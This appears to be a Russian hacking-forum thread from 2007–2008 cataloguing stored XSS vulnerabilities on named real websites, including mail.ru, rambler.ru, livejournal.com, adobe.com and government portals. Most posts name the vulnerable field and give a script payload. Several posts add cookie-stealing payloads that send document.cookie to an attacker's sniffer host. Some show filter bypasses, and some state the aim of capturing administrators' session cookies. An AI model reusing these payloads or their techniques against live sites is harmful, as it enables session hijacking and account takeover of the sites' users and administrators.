Просмотр полной версии : Активные Xss
Тут постим тока активные XSS.
Так же сайт на котором вы нашли xss должен быть более или менее популярным:
1. Он не должен быть расположен на бесплатном хостинге.
2. Так же тиц и pr сайтов должны быть соотвественно не ниже 100 и 3. Сайтов удовлетворяющих этому требованию хоть отбавляй, а вот постить и искать xss на совсем не известных не интресно и не имеет смысла вообще.
Желательно (но не обязательно), что бы сайты были на it тематику, или к примеру более менее известные треккеры, порталы.
Сайт с хак-софтом, там и мой трой лежит))
samouchka.net - когда коммент добавляешь впиши.
<img src=http://samouchka.net/engine/data/emoticons/sad.gif onload=XSS]
www.jjurnal.ru
Довольно популярный жж.
Постим сообщение от анонимного пользователя.
Уязвимо поле "Имя:"
"><script>alert()</script>
Работает в опере и ие.
DimOnOID
19.03.2007, 14:25
email.ru
может и было..ибо XSS самая тупая))
..
отправляем письмо ..естестн в html....
<script>alert()</script>
или
<img src=javascript:alert()>
serials.softkiller.net
В теме любого кряка пишем камент с хсс
"><script>alert('xss')</script>
proplay.ru
Идём в раздел "Команды":
--http://www.proplay.ru/team/
Там создаём новую команду.
Уязвимыми являются поля:
-Игры
-IRC канал
-Домашняя страница
Test:
--http://www.proplay.ru/team/744/
DimOnOID
20.03.2007, 23:56
sysadmin.mail.ru
Заходи на sysadmin.mail.ru.....
Сморим *Сервисы Сисадмина* там лезим в *Моя регистрационная анкета*
в поле Крупный город: Выбираем любой город))
далее в поле Свой город/район: строчим "><script>img = new Image(); img.src = "http://сайт.ru/сниффер.gif?"+document.cookie;</script>
и жмём Сохранить изменения...
после переходим в Whois ..находим наш город...если в списке ников есть наш ник.....значит куки уже на снифе))ибо ненадо даже давать ссылку на свой профиль...просто на город где ваш логин)) :)
www.qiq.ru
После регистрации, в профиле изменяем уязвимые поля, а именно:
1)Место жительства
2)О себе
А этих местах пишем
"><script>alert(/xss/)</script>
Пример (http://qiq.ru/users/279919.html)
ДОМ 3 ХЭК =))))))
dom3mir.ru
Регистрируемся с любыми данными......
Далее идем изменять свою анкету...
В уязвимые поля: Район, Метро,Город пишем такой код..ну там уж как придумаете
Москва" onmouseover="alert('xss')"
Далее идете в поиск...ищите себя понику и вот xss =)
http://www.ohizba.ru/index.php?type=page&id=13
уязвимы все поля в гостевой книге
фуфло, но баг..
//updat3:
http://www.autolider.info/news/main.php?id=108&cpage=1
уязвимость в поле "name" в комментах ;)
извините, редактирование не пашет.. если я что-то нарушил, соедините плз посты :)
запахало)
splashblog.com
Блоггер фоток. Заливаем новую фотку. Уязвимо поле "Caption:"
"><script>alert();</script>
Работает в ие и опере.
http://rock-rus.com.ru/users.php
в регистрации пишем мыло blblbl@hek.cc"><script>alert('alert')</script>
icq.com
Заходим на форумы или в группы, создаем голосование. Уязвимы поля "Answer..."
<script>alert(1);</script>
Получилось голосование и теперь, когда кто-либо будет голосовать за пункт с алертом - то будут выскакивать все алерты (дапустим вы поставили алерты на все ансверы)))
Работает в ие и опере.
meta.ua
Идем в блог, создаем комментарий
<script>alert(10);</script>
и при ответе на этот коментарий вылезает алерт.
Работает в ие и опере.
comby.ru
Везде где можно оставить комментарий:
<img src=javascript:alert()>
вылезет алерт.
Работает в ие и опере.
http://planeta.solo.by/- геймерский сайт провайдера.
В личку написать:
<img src=fuck onerror=alert(\'xss\')
Horsekiller
07.04.2007, 11:01
tForum <= b0.915
Форум малораспространённый, но всё же.
Активная XSS в поле "Message".
http://www.target/path/message.php
Вставляем в поле "Message":
javascript:alert(document.cookie)
В кукисах сессия, логин.
Отморозки
http://www.otmorozki.org/images/login_d.gif
=============
Otmorozki.org
=============
Заходим в любую новость пишем комментарий...
Уязвимое поле "тема" ..вот там и пишем наш кодик..
"><script>alert("Отморозки вас похекале")</script>
Теперь ваша уязвимость ( xss ) будет гулять везде))Даже на главной странице
Warcraft
http://games.mipt.ru/wc3/images/miptlogo.png
=============
Games.mipt.ru/wc3/
=============
Уязвимые поля при регистрации:
"Полное имя"
"О пользователе"
"Дом.страница"
Вставляем туда код "><script>alert("Mipt \nВас похекале....\nУязвимость на вашем сайте нашел я, Isis \nРеспект всему античату \nА также отдельный респект:\n gemaglabin\n Great\n blackybr\n ettee\n and etc..... Гыгы \n Короче вас похекале :))) ")</script>
И вот пример.....просмотр моего профиля
Isis (http://games.mipt.ru/wc3/w3forum/index.cgi?uinfo=Isis)
buka.ru
в камментах к новостям
' любезно заменяются на "
warlog.info
Заходим в настройки сайта. Уязвимо поле "Название"
<script>alert();</script>
Теперь при просмотре статистики сайта на главной странице вылезает алерт.
Downloads.ru
http://downloads.ru/pics/www.gif
Выбираем любой файл....пишем к нему комментарий...
Все поля уязвимые т.е. мыло, ник и сообщение ...
"><script>alert("xss")</script>
Пример (http://downloads.ru/win/2600.hts#)
ukrtelecom.ua
http://lib.kost.dn.ukrtelecom.ua/guestbook.php
liveinternet.ru
В дневниках.
1) Пишем личное сообщение. Уязвимо поле "Заголовок:"
"><script>alert();</script>
Если пользователь ответит на это сообщение, то велезет алерт.
2) Добавляем новость в дневник. Уязвимо поле "Добавление новости:"
"><script>alert();</script>
2 »Atom1c«
пост №16
http://forum.antichat.ru/showpost.php?p=328085&postcount=16
zip-2002,
http://www.zip-2002.ru/forum/new.php?t=1&cat=3
В форме сообщения вводим: <script>alert();</script>
Сайт: http://aktiv.kak-ya.ru/
Путь: http://aktiv.kak-ya.ru/by/ole4ka/2006/04/26/3434/comments
Уязвимое поле: Заголовок
"><script>alert("hek \nActive_jaja")</script>
Сайт: http://forum.allsoch.ru/
Путь: http://forum.allsoch.ru/showthread.php3?s=11&threadid=17076
Уязвимое поле: Ваш ответ.
"><script>alert()</script>
http://www.booka.ru/
Вставить в поле Поиск
"><script>alert()</script>
http://www.oplachu.ru/tov226182.html
Вставить в поле Ваш комментарий
"><script>alert()</script>
http://catalog.kgbi.ru/
http://catalog.designatelie.ru
Вставить в поле Поиска
"><script>alert()</script>
http://www.booka.ru/
Вставить в поле Поиск
Код:
"><script>alert()</script>
Gals, это же пассивная xss.
Сайт: http://www.photo-cult.com/
Путь: http://www.photo-cult.com/showpic.php?rate&id=187916
Уязвимое поле: Коментар
"><script>alert()</script>
DimOnOID
24.04.2007, 21:49
http://www.bilandima.ru бррр..противно...
Дневники>Новая Запись> Адрес фотографии >
http://"><script>alert(/xss/)</script>
да ещё там в куках..пасс в открытом виде)
rambler.ru
В «Планете» -> «Профиль» -> «Контакты»
Уязвимо поле “ICQ 2” и название аватарки.
Куки не стыришь, тк ограничение стоит 22 символа(((
<img src=javascript:alert()>
Horsekiller
25.04.2007, 06:45
http://kemclub.ru/
При регистрации (http://kemclub.ru/reg.php), уязвимо поле Ф.И.О -
<script>alert()</script>,
потом заходим http://kemclub.ru/club.php?p=8&srat=1
Находим себя, получаем алерт.
Horsekiller
26.04.2007, 09:11
http://ismart.ee/
Интернет магазин по продаже книг. Искал где купить "Красный Лондон", нашел XSS : )
При регистарации (http://ismart.ee/Books.dll/login?next=index)
уязвимы поля:
1. E-mail; - вписываем qwe@qwe.ru"><script>alert(/xss/)</script>
2. Ваше имя. - вписаваем
<script>alert(/xss/)</script>
Далее можно изменить приветствие на <script>alert(/xss/)</script>
, тоже работает.
Все заказы просматриваются вручную кстати ;)
И напоследок пассивная XSS, хотя это и не так интересно : http://ismart.ee/Books.dll/find?fulltextfind=1&fastfind=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C %2Fscript%3E
Сайт http://www.cskabasket.com/
Постим коммент
<script>alert ();</script>
http://www.yandex.ru/cgi-bin/test-robots?host=morpheg.narod.ru
Хек или не хек?
forum.xakep.ru
Запостил сюда тк не понял какой у них тип форума.
На форуме прицепляем файл тхт с содержанием:
"><script>alert()</script>
и открываем его в опере, именно в опере не через блокнот!!! но млин касяк в том что у меня срабатывает через раз))) В куках много полезной информации.
на ие не тестил, он у меня глючит).
на ачате слева ссылка $$$ для web-мастеров
http://tak.ru/editing.php
в любом поле нет фильтрации : "><script>alert()</script>
http://dyn.gismeteo.ru/cgi-bin/showmap.exe?base=commonmaps&file=BALTIC.GIF&lang=rus&title=%3Cscript%3Ealert('Here%20was%202pick');%3C/script%3E
http://dyn.gismeteo.ru/cgi-bin/showmap.exe ?base=commonmaps&file=BALTIC.GIF&lang=rus&title=%3Cscript%3Ealert('Here%20was%202pick');%3C/script%3E
это пасивная
Horsekiller
04.05.2007, 08:10
http://emo.nnov.ru/
Очень популярный сайт эморей :D
Уязвимо поле E-mail:
qwe@qwe.com"><script>alert()</script>
']Верховна Рада України
_http://portal.rada.gov.ua/control/uk/publish/category/news_left?from="><script>alert(document.cookie)</script>
это пасив кажись
в тему
уязвимое поле comments_http://martinlittle.com/guestbook/signguestbook.php
_http://www.beachhouse-hotel.com/signguestbook.php (пост можно увидеть на последней странице)
http://www.booka.ru/
Вставить в поле Поиск
"><script>alert()</script>
или в томже поле</title><script>alert('xss')</script>
и от меня парочка багов )
http://www.hiidlane.ee/index.php?moodul=3&q="><script>alert(/xss/)</script>
http://www.turundusinfo.ee/?id=55&search="><script>alert('xss')</script>&search_src=all
Вы можете отличить пассивную от активной?
Вы можете отличить пассивную от активной?
Нет. В чом разница ?
Для активной не нужно никаких действий со стороны пользователя.
http://www.pfadi.ch/pal/tohuwabohu/guestbook/schreiben.php
уязвимы почти все поля
Luccifer
09.05.2007, 15:53
Тема нах..не нужная вот если бы вы выкладывали активные xss на таких почтовиках как :rambler.ru, yandex.ru или лучше всего mail.ru то это другое дело....а это все не иначе как МУСОР...не кому нах... не нужный=))))
Пустая трата времни.
Если ты такой умный сам там ищи.
К тому же ты наверно слепой, потому что на всех перечисленных тобой сайтах выкладывали уже хсс.
Luccifer
09.05.2007, 16:04
freddi
Но не все работают по сей день.Я именно про активные....
[53x]Shadow
12.05.2007, 00:38
Нет. В чом разница ?
Активная XSS (сохраненная) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных одним пользователем, сохраненных в системе и доступных для вывода другим пользователям системы.
Т.е. в общем актив это когда уязвимость сохраняется в системе и выдается всем пользователем зашедшим на страницу с уязвимым параметром.
Пассивная XSS (переданная) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных системе в параметрах HTTP-запроса с последующим их выводом в HTML-страницу.
Пассив в общем когда подсовывается ссылка пользователю, содержащая скрипт переданный в уязвимом параметре. Сработает один раз когда пользователь перейдет по специально сформированной ссылке, если же он перейдет на сайт по обычной ссылке, то ничего не произойдет.
Tak.ru
При регистрации уязвимы поля Login, ФИО, Email
Далее в настройках....
Уязвимы поля Название сайты, ссылка на него...
Так вот...
На этом сайте зарегистрированны 37к человек и размещают их рекламу на своем сайте....
И...в связи с этим...вы можете поломать множество сайтов...Как?
Очень просто.....
В панели управления, есть меню типа реклама..
Так вот там можно ставить разделитель рекламы....
Ставим "><script>alert(/xss/)</script>
И вот.....хсски на нашем сайте...
А почему я сказал что другие сайты можем поломать??
ПОтому что также здесь есть sql-inj, это вы найдете сами =)
ыыыы, какой красивый домен mydak.ru
http://www.mydak.ru/today.php
Думаю сами знаете что и куда вствлять...
на мои хек алерты не обращайте внимания =)
Horsekiller
20.05.2007, 09:21
http://dash.ru/
При регистрации указываем маил : your@mail.ru"><script>alert()</script>.
На мыло приходит ссылка для активации.
http://dash.ru/user/?menu=setup
При просмотре профиля или настроек вылезат алерт.
ll.oo.lv
Регистрация, изменение профиля....
Уязвимы все поля...
Активная xss при просмотре профиля http://ll.oo.lv/?do=prof&user=SnooPI
такой вот хек =)
DimOnOID
20.05.2007, 21:03
zgrk.com.ua
пишем в теле письма <img src='' onerror=alert(666)>
http://www.linux.org/user/register.html
Уязвимы поля First Name и Last Name.
Пример запроса: '><script>alert('Hacked%20by%20XenOtai')</script>
mail.ru yandex.ru rambler.ru
отправляем сообщение на почту и прикладываем файлик txt со скриптом. если открыть его в ие то вылезет алерт, должно сработать и в опере(не хочу ставить чтобы проверять), а в фф не работает.
минус: все что вы напишете в этот файл отобразится в письме(кроме рамблера)
на мейле прикрыли. куки норм приходят только на рамблер.
http://www.konami.com/edealinv/servlet/ExecMacro?nurl=control/Registration.vm&ctl_nbr=3810
Уязвимы многие поля, например Company Name и First Name.
Пример запроса: "><script>alert('Hacked%20by%20XenOtai')</script>
DimOnOID
29.05.2007, 23:19
travel.mail.ru
Наводим мышкой на рисунОК
http://travel.mail.ru/account_photos_popup.php?account_id=4163847
БуГагага..уже закрыли........10 часов жилаа...ххехехех))) ПРЕВЕД АДМИНАМ МАЙЛА... :p
Хэк в индексе=) поле Адрес сайта
http://hackyou.ru/
описание тут (http://forum.antichat.ru/showthread.php?t=34117)
_Pantera_
12.06.2007, 23:47
www.web-hack.ru --> добавить новость
Вбиваем все данные на фонарь кроме кода, его вводим правильно. В саму новость(textarea) пишем:
<script>alert(document.cookie)</script>
и жмем кнопочку добавить (Аdd)
ps Как выяснилось, она является активной.
www.wikiupload.com
Заливаем любой файл...в описание пишем
'"><script>alert(/xss/)</script>
Кнопочку "upload" жмем...
Выдается 2 ссылки, одна на скачку, другая на комментарии файла..
Идем в каменты и видим хсс
Пример
http://www.wikiupload.com/comment.php?id=158669
DimOnOID
13.06.2007, 19:58
chatcity.ru
Ну вообщем то........вроде чаты на chatcity
Поля:
E-mail
web-страничка
Вот один пример на volchat.ru
http://volchat.ru/people/pp0.cgi?c=13397&cn=trane___
narod.yandex.ru
Пишем письмо в сообщество, уязвимо поле "Ваш сайт:"
<script>alert('123');</script>
nm.ru
прикрепляем к письму файл txt или pdf со скриптом.
www.xyligan.ru
уязвимо поле "имя"))))
зы это из компании Хакера
ззы пассивных там полно.
www.xakep.ru
хсс в чате
уязвимо любое поле, но только одно, там нет ограничения на кол-во символов, но стоит фильтрация символов:
" ? +
это можно спокойно обойти через String.fromCharCode()
сам код идет в виде
"onmouseover="navigate('адрес_снифера'.concat(docume nt.cookie))"
или просто
"onmouseover="alert('xss')"
кодируем
navigate('адрес_снифера'.concat(docume nt.cookie))
с помощью http://ha.ckers.org/xss.html
получится примерно
navigate
и пишем в виде
"onmouseover="String.fromCharCode(то что закодировали)"
ну чтоб все заработало там ставится галка "Допустить других к просмотру профайла" и говорим посмотрите мой профиль вот так)
зы спс DimOnOID за небольшую помощь)
www.panvasoft.com
Весьма популярный,посещаемый сайт.
потставляем "><script>alert()</script> во все поля в коментариях.
Пример:http://panvasoft.com/rus/11970/gb/
www.hpclub.ru
Добавление комментарий
"><script>alert()</script>
Пример:http://www.hpclub.ru/news.php3?cID=4
www.consultclub.biz
Добавление комментарий
"><script>alert()</script>[/B]
[53x]Shadow
29.06.2007, 16:30
www.lektravi.ru
Интернет магазин Лекарственные травы
Травки не желаете....=)
Активка в гостевой, при добавлении сообщения в поле почта пишем
'><script>alert("ShaDow");</script>
пример (http://www.lektravi.ru/e107_plugins/guestbook/guestbook.php)
www.internet.ru
Уязвимые поля: "Ваше имя";"Тема".
Добавление комментарий: <script>alert()</script>
Пример: http://www.internet.ru/news/2007-06-17409#comment-16117
Elvis000
23.07.2007, 11:05
англииская газетенка
http://www.accringtonobserver.co.uk/news/comments/form.html?story_id=230456
nm.ru
http://www4.nm.ru/users/reg.dhtml?__post=1&login=asdasdasdasd&domain=<script>alert()</script>&passwd=asd&pass2=asd&quest_helper=&quest=&answ=
это пассивная xss.
чтобы сделать ее активной, пишем html-мессагу и подключаем xss через ифрейм.
http://www.hotfile.ru
Закачиваем файл любой, в поле "Описание" суем наш зловредный код.
В данном случае
'"/><script>alert(/xss/)</script>
Получаем линк на скачивание, смотрим - активная хсс
Пример - http://www.hotfile.ru/52377/
http://meetfile.com
Зарегистрировались, заходим в профиль, изменяем его..
Уязвимы все поля...
'"/><script>alert(/xss/)</script>
dump.ru
уязвимо поле "Tags:" при заливке файла.
[53x]Shadow
20.08.2007, 01:09
Дневник на sestrenka.ru
Заводим дневник->постим сообщение в виде хтмл->собираем куки =)
пример (http://www.sestrenka.ru/dnevnik/beginer/)
http://www.fos.ru/
Заходим в гостевую книгу, нажимаем создать новое сообщение и пишем: '><script>alert('xss')</script> уязвимы все поля
http://provodka.ru/news.php?part=3&id=7545
Оставляем комментарий такого содержания:
"/><script>alert(/xss/)</script>
уязвимы оба поля
1. Сервис загрузки файлов на сервер http://ifile.kiev.ua/
В поле "ОПИСАНИЕ" пишем
'"/><script>alert(/xss/)</script>
Пример http://ifile.kiev.ua/download_file/618/
2. Сервис загрузки файлов на сервер http://www.sendfiles.com.ua
После загрузки файла, в описании пишем
'><script>alert(/xss/)</script>
Пример http://www.sendfiles.com.ua/24431
UPD
тут же: При добавлении коментария, пишем в поле "Отзыв"
<script>alert(/xss/)</script>
http://www.skoda-russia.ru/resume.php
Оставляем комментарий такого вида:
"><font color=red onmouseover=javascript:alert('xss')>алерт работает!</font>
http://diary.ru/options/diary/?mydiary
Уязвимо поле "Название дневника". Каждый, кто зайдёт на Ваш дневник, напорется на хсс.
Пример запроса в поле:
"><script>alert(document.cookie)</script>
http://musicscope.ru/content/led-zeppelin-%D1%81%D0%BD%D0%BE%D0%B2%D0%B0-%D0%B2%D0%BC%D0%B5%D1%81%D1%82%D0%B5%3F
Оставляем комментарий такого вида:
"><script>alert('xss')</script>
livejournal.com
Активная хсс в поле "штат вне США (провинция, территория)". Каждый, кто зайдёт в Ваш профиль, напорется на хсс.
Пример запроса:
<script>alert(document.cookie)</script>
Пример можно посмотреть здесь:
http://test-govno.livejournal.com/profile
PS. Не должны быть указаны страна и часовой пояс.
AdReNa1!Ne
14.09.2007, 21:07
http://robotraff.com/userpanel/selltraff.php
Уязвимы все поля
Результат - http://robotraff.com/userpanel/stats.php?thread=136
lsass.exe
14.09.2007, 21:34
http://www.bolero.ru//index.php?level=5&stype=quick&topic=0&cur_topic=0&cur_fquery=%3Cscript%3Ealert%28%5C%27xss%5C%27%29% 3C%2Fscript%3E&sclass=all&cat=0&fquery=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2 Fscript%3E&cat=0&x=0&y=0
http://4pda.ru/sr.php?query=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
Активная XSS на infostore.org
На момент описания уязвимости, на infostore Администрацией были приняты меры, и включена привязка к IP адресу.
.................................................. .......................
Уязвимость существует из-за недостаточной фильтрации входных данных в поле "текст:"
при добавлении новости пользователем, и в личных сообщениях.
В поле "текст:" пишем следующие:
<img src="a"onError=javascript:alert('XSS');>Также, еще была найдена пассивная XSS
<a href="javascript:String.fromCharCode(60,115,99,114,105,1 12,116,62,97,108,101,114,116,40,100,111,99,117,109 ,101,110,116,46,99,111,111,107,105,101,41,60,47,11 5,99,114,105,112,116,62)">XSS</a>.................................................. .......................
______________________________________________
*****************************************
Активная хсс в поле "штат вне США (провинция, территория)". Каждый, кто зайдёт в Ваш профиль, напорется на хсс.
длина поля maxlength="50" , не хватает, чтобы нормальный редирект на сниффер поставить
длина поля maxlength="50" , не хватает, чтобы нормальный редирект на сниффер поставить
Это не сложно обойти с помощью снифера и конструктора запросов, типа naviscope и inetcrack или Data tamper для FF или банального исправления формы у себя на винте
icq.com
все прошлые прикрыли, но:
опять в блоге, и опять уязвимо поле "Image web address:"
"onmouseover="alert('xss')"
все символы не фильтруются и кол-во не ограниченно
SSSetuPPP
21.10.2007, 04:35
icq.com
все прошлые прикрыли, но:
опять в блоге, и опять уязвимо поле "Image web address:"
"onmouseover="alert('xss')"
все символы не фильтруются и кол-во не ограниченно
Где находится это поле "Image web address:"?
SSSetuPPP
21.10.2007, 04:37
mail.ru yandex.ru rambler.ru
отправляем сообщение на почту и прикладываем файлик txt со скриптом. если открыть его в ие то вылезет алерт, должно сработать и в опере(не хочу ставить чтобы проверять), а в фф не работает.
минус: все что вы напишете в этот файл отобразится в письме(кроме рамблера)
на мейле прикрыли. куки норм приходят только на рамблер.
И на рамблере тоже не работает...:(
И на рамблере тоже не работает...:(
работает, в ие по крайней мере точно.
Где находится это поле "Image web address:"?
http://img30.picoodle.com/img/img30/6/10/21/f_1013m_424a366.jpg
SSSetuPPP
23.10.2007, 15:58
работает, в ие по крайней мере точно.
Слушай у меня не работает, может я чё не так делаю? Не мог бы ты пободробней объяснить?
BlackCats
25.10.2007, 23:13
cyberfight.ru популярный ресурс - 7000-8000 хостов в день.
пример:
http://www.cyberfight.ru/site/profile/108747
при регистрации в кач-ве логина указываеш скрипт, потом пр просмотре твоего профля - он выполница.
ЛифчиС5СВ
26.10.2007, 22:30
cyberfight.ru популярный ресурс - 7000-8000 хостов в день.
пример:
при регистрации в кач-ве логина указываеш скрипт, потом пр просмотре твоего профля - он выполница.
Добавлю, что там еще пассивная ХСС c куками. Уж0с
http://www.cyberfight.ru/info/search/?qry=%22%3E%3Cscript%3Ealert%28document.cookie%29% 3C%2Fscript%3E&Search.x=0&Search.y=0
BlackCats
26.10.2007, 23:12
пассивные я тоже находил, но эта тема называется активные xss ;)
BlackCats
27.10.2007, 17:12
http://livechat.boldchat.com/aid/6278237534205176796/bc.chat
active XSS в поле your name
Paradox Security Systems
http://paradox-security.ru/index.php?action=%22%3E%3Cscript%3Ealert(%22XSS%20 BY%20Fugitif%22)%3C/script%3E
edit:
Blogus.ru
http://www.blogus.ru/tagposts.aspx?id=%22%3E%3Cscript%3Ealert(%22XSS%20 BY%20Fugitif%22)%3C/script%3E
edit:
Moto.ru
http://www.moto.ru/ubbthreads/showprofile.php?Cat=%22%3E%3Cscript%3Ealert(%22XSS %20BY%20Fugitif%22)%3C/script%3E
Fugitif, и где там активность????
_http://job.properm.ru/
_http://auto.properm.ru/
Заполняем вакансию, резюме, объявление, и в поле ФИО пишем
Иванов Иван <script>alert(/ xss /)</script>
Заходим на сайт _http://www.virtualflowers.ru/abook.php
Добавить адресата - в каментах
<script>alert(/ GraBBerZ.com /)</script>
mail.ru
в блогах пишем сообщение, там можно использовать разные теги, например имейдж
<img src="адрес_снифера">
так все прекрасно работает, но куки не отошлешь тк стоит фильтрация "+", я как ни старался не обошел ее.
зы пользуясь случаем хочу передать привет админам мейла.
Серенький
31.10.2007, 02:05
netprint.ru
Регистрируемся, создаем альбом с любым именем и грузим фотографию, которую переименовываем в <script>alert()</script>
Укладываемся в 40 символов.
phol1eadeux
03.11.2007, 03:31
ЛЕНТА - сеть гипермаркетов
http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script>
ЛЕНТА - сеть гипермаркетов
http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script>
Ошибся разделом, это пассивная
phol1eadeux
03.11.2007, 18:00
Разобрался
~!DoK_tOR!~
04.11.2007, 02:45
http://nsti.ru/guest/
Гостевая книга
Добавляем во все формы: "onmouseover="alert('xss')"
www.miem.edu.ru
Заходим в раздел выпускники и регистрируем себя. Уязвимые поля: город, адрес, icq, web.
http://www.econ.msu.ru/
Регистрируемся, уязвимые поля в регистрации: Фамилия, Имя
http://www.rapway.com.ru/
Гостевая книга. Уязвимые поля: Имя, E-mail, ICQ, Сайт
www.saletime.biz
Гостевая книга. Уязвимо поле: Имя
http://livemy.info
Регистрируемся, идем в раздел "События", уязвимое поле - описание события.
http://blog.inf.by
Регистрируемся, уязвимое поле: Название блога
Че-то пост разросся =)
Верховная Рада Украины =)
http://portal.rada.gov.ua
Регистрируемся, уязвимые поля: Имя, Ответ на секретный вопрос, Прозвiще вроде =)
Adobe.com
регимся здесь
https://www.adobe.com/cfusion/membership/index.cfm?nf=1&loc=en%5Fus
при регистрации вставляем в любое поле
<script>alert(12121)</script>
кроме e-mail, password, zip-code...
заходим в свой аккаунт и видим активную XSS...
Можно предположить, что админ сможет просмотреть аккаунт пользователя, а заодно и отправить куки на снифф :)
http://www.pcgames.lt
Уязвимые поля при регистрации:Nick,Vardas,Pavardė
www.omen.ru
Уязвимые поля при регистрации:Имя,О себе кратко, О себе подробно, возможно еще множество полей, дальше проверять не стал, ибо смысла не вижу =)
P.S. Сорри за 2ой пост =)
phol1eadeux
20.11.2007, 19:36
это в пассивные xss
www.fanat.com.ua
Украинские фанаты футбола
http://www.fanat.com.ua/cgi-bin/search.cgi?q=%22%3E%3Cscript%3Ealert(achat)%3C/script%3E%3C%22
www.fanat.com.ua
Украинские фанаты футбола
http://www.fanat.com.ua/cgi-bin/search.cgi?q=%22%3E%3Cscript%3Ealert(achat)%3C/script%3E%3C%22
1. Это пассивная.
2. Сообщение в алерте нуждается в одинарных кавычках.
inlanger
27.11.2007, 20:50
это тоже пассивная. люди, читайте статьи и разбирайтесь что в какую тему писать
BlackCats
02.12.2007, 16:19
http://www.rabotnitsa.ru/guestbook.php
сайт журнала работница уязвимые поля емейл, автор
otmorozok428
04.12.2007, 15:52
Форум сертифицированных специалистов :)
http://www.certification.ru
В добавляемое сообщение вставляем:
<img src=javascript:q=new/**/Image;/**/q.src='http://www.mysite.ru/script.php'+'?c='+document.cookie>
И ждём, когда к нам в гости прилетят админские кукизы.
REDHAT
https://www.redhat.com/wapps/sso/rhn/login.html?redirect=%22%3E%3Cscript%3Ealert(%22XSS %20by%20Fugitif%22)%3C/script%3E
SWISS CARD
http://www.swisscard.ch/d/stellen/stellen_detail.php?oid=%22%3E%3Cscript%3Ealert(%22 XSS%20by%20Fugitif%22)%3C/script%3E
AND
PAYPAL SUCKS
http://www.paypalsucks.com/forums/showthread.php?fid=17&tid=6209&old_block=0&block=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
:p
EDIT:
here is wrong place...sorry ppl
NilsonUA
06.12.2007, 00:17
libra.kiev.ua/list_lyr.php?show_id=6578&page=1
в поле эмайл вводим '"><script>alert('Хss')</script>
BlackCats
06.12.2007, 11:10
http://playboy.com.ru/stat/se.php
активная ксс на официальном российском сайте суперпопулярного плейбоя
описание тут:
https://forum.antichat.ru/thread55136.html
Mike 007
06.12.2007, 21:26
http://www.babki.net/search.php
в поисковике товаров введите <script>alert('Mike 007 rulezz :D')</script>
BlackCats
07.12.2007, 00:52
http://www.oops.ru/stat/se.php
активная xss на официальном российском сайте популярного журнала OOPS
описание тут:
https://forum.antichat.ru/thread55136.html
BlackCats
07.12.2007, 17:28
http://www.qr.ru/stat/se.php
активная xss на официальном российском сайте популярного журнала Quattroruote
описание тут:
https://forum.antichat.ru/thread55136.html
DimOnOID
26.12.2007, 10:07
Простенькая активка на My.mail.ru
Заходим в раздел *Желания* ->>Добавить желание...
Уязвимо поле *Метки* ...
Пример http://my.mail.ru/my/wishlist?wish=313616
:) С Новым Годом) :)
P.S Активка уже не работает....10 часов прожила) .ПРЕВЕД АДМИНАМ МАЙЛА..И ЛИЧНО ЗАКЕРУ.....Знаю ещё одну..но больше не надейтесь, что я тут выложу)
webfile.ru
загружаем картинку\пдф\тхт файлы со скриптом. скрипт выполняется при открытии файла.
Активная XSS на http://www.scandasia.com/
Уязвимость в комментариях к новостям в поле Your comment:
Например: http://www.scandasia.com/viewNews.php?coun_code=dk&news_id=4009 (http://www.scandasia.com/viewNews.php?coun_code=dk&news_id=4009)
mail.ru yandex.ru rambler.ru
отправляем сообщение на почту и прикладываем файлик txt со скриптом. если открыть его в ие то вылезет алерт, должно сработать и в опере(не хочу ставить чтобы проверять), а в фф не работает.
минус: все что вы напишете в этот файл отобразится в письме(кроме рамблера)
на мейле прикрыли. куки норм приходят только на рамблер.
add
сейчас пробовал отправлять файлы типов: jpg xml txt pdf, все прекрасно везде работает %)
SSSetuPPP
15.01.2008, 18:21
должно сработать и в опере(не хочу ставить чтобы проверять)
Я поставил и проверил - не работает. (в IE работает)
www.todj.ua - главный клубный портал Украины
В своем профиле, в разделе фото:
topdj.ua/clubbers/ваш_id/photo/
создаем новую галерею и в поле "название" вписываем js-код. Поле "клуб" вообще нигде не отображается, а "описание"- фильтруется.
Found by: /me
Вот моя активная xss:
_http://job.properm.ru/
_http://auto.properm.ru/
Заполняем вакансию, резюме, объявление, и в поле ФИО пишем
Иванов Иван <script>alert(/ xss /)</script>
Заходим на сайт _http://www.virtualflowers.ru/abook.php
Регестрируемся [ регистрация там фуфло какое-то ;) ]
Добавить адресата - в каментах <script>alert(/ Dreel /)</script>
http://www.slando.com.ua/images/slando.gif
Бесплатные объявления Киева
Заходим по адресу http://www.slando.com.ua и тыкаем кнопочку "подать объявление" продажа авто, уязвимо поле модель:
<script>alert(/ D /)</script>
Есть один недостаток - максимум 30 символов.
ero-club.ru
В своем профиле давим "добавить новое фото" -
создаем новый альбом и в поле"Название" пишем ядовитый код
<script>alert(/iddqd/)</script>
http://www.knor.ru/cgi-bin/mag.pl?otziv гостевая полный набор и пасиф и актив
<script>alert(/отжиг/)</script>
зы то что, вчера написано было потерли... а баг видимо не хотят исправлять ну и ладно, я не в обиде, действительно, кому охота копаться в коде, тем более если он не твой :D )
http://news.nag.ru/news/root/crnews/
Уязвимы комментарии.
http://news.nag.ru/news/root/crnews/story15827/
SSSetuPPP
22.01.2008, 12:40
народ поскажите что я могу зделать с этой xss тоько в IE пашет?? http://helpdesk.flygroup.st/index.php?="><script>alert(5555)</script>
пробовала это захожу по ссылке() на снифер не чего не приходит в чем может быть проблема?
http://helpdesk.flygroup.st/index.php?="><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
заранее спасибо
http://s.netsec.ru/регистрируй там сниффер
http://s.netsec.ru/Твой_Логин.gifадрес твоего сниффера
<a href="http://s.netsec.ru/Твой_Логин.gif?test">click me</a>вызов по ссылке
<img src="http://s.netsec.ru/Твой_Логин.gif">код HTML
<script>img = new Image(); img.src = "http://s.netsec.ru/Твой_Логин.gif?"+document.cookie;</script>вызов из скрипта
GreenBear
Сниффер от netsec.ru
http://forum.antichat.ru/thread36829-%F1%ED%E8%F4%F4%E5%F0.html
•†•SyTiNeR•†•
29.01.2008, 22:41
